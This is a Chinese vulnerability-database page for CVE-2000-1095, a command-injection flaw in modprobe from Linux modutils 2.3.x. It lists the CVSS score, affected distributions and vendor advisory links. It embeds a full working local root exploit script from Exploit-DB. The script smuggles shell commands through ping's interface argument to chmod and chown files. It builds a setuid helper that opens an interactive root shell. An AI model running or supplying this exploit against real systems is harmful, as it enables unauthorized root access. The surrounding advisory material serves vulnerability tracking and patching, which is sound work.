CVE-2000-1095
CVSS7.2
发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-05 16:22:38
NMCOE    

[原文]modprobe in the modutils 2.3.x package on Linux systems allows a local user to execute arbitrary commands via shell metacharacters.


[CNNVD]Linux系统modutils包modprobe执行任意命令漏洞(CNNVD-200101-015)

        Linux系统modutils 2.3.x包的modprobe存在漏洞。本地用户可以借助shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:conectiva:linux:5.1Conectiva Conectiva Linux 5.1
cpe:/a:immunix:immunix:6.2
cpe:/o:mandrakesoft:mandrake_linux:7.2MandrakeSoft Mandrake Linux 7.2
cpe:/a:immunix:immunix:7.0_beta
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:redhat:linux:7.0Red Hat Linux 7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1095
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1095
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-015
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1936
(VENDOR_ADVISORY)  BID  1936
http://www.redhat.com/support/errata/RHSA-2000-108.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2000:108
http://xforce.iss.net/static/5516.php
(UNKNOWN)  XF  linux-modprobe-execute-code
http://www.linux-mandrake.com/en/security/MDKSA-2000-071-1.php3?dis=7.1
(UNKNOWN)  MANDRAKE  MDKSA-2000:071
http://www.debian.org/security/2000/20001120
(UNKNOWN)  DEBIAN  20001120 modutils: local exploit
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000340
(UNKNOWN)  CONECTIVA  CLSA-2000:340
http://archives.neohapsis.com/archives/linux/suse/2000-q4/0596.html
(UNKNOWN)  SUSE  SuSE-SA:2000:44
http://archives.neohapsis.com/archives/bugtraq/2000-11/0179.html
(UNKNOWN)  BUGTRAQ  20001112 RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)

- 漏洞信息

Linux系统modutils包modprobe执行任意命令漏洞
高危 未知
2001-01-09 00:00:00 2006-09-15 00:00:00
本地  
        Linux系统modutils 2.3.x包的modprobe存在漏洞。本地用户可以借助shell元字符执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20402)

Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability (EDBID:20402)
linux local
2000-11-12 Verified
0 Michal Zalewski
N/A [点击下载]
source : http://www.securityfocus.com/bid/1936/info

Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.

The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.

Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().

One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.

Successful exploitation of this will yield root access for the attacker.

#!/bin/sh

echo
echo "RedHat 7.0 modutils exploit"
echo "(c) 2000 Michal Zalewski <lcamtuf@ids.pl>"
echo "Bug discovery: Sebastian Krahmer <krahmer@cs.uni-potsdam.de>"
echo
echo "Do not have to work on older / non-RH systems. This bug has been"
echo "introduced recently. Enjoy :)"
echo
echo "This exploit is really hackish, because slashes are not allowed in"
echo "modprobe parameters, thus we have to play in modprobe's cwd (/)."
echo

PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0
fi

echo "Phase 1: making / world-writable..."

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "Phase 2: compiling helper application in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Phase 3: chown+chmod on our helper application..."

$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system :("
  exit 1
fi

echo "Voila! Entering rootshell..."

/x

echo "Thank you."		

- 漏洞信息

1641
Linux modprobe popen Function Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-11-12 Unknow
2000-11-12 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站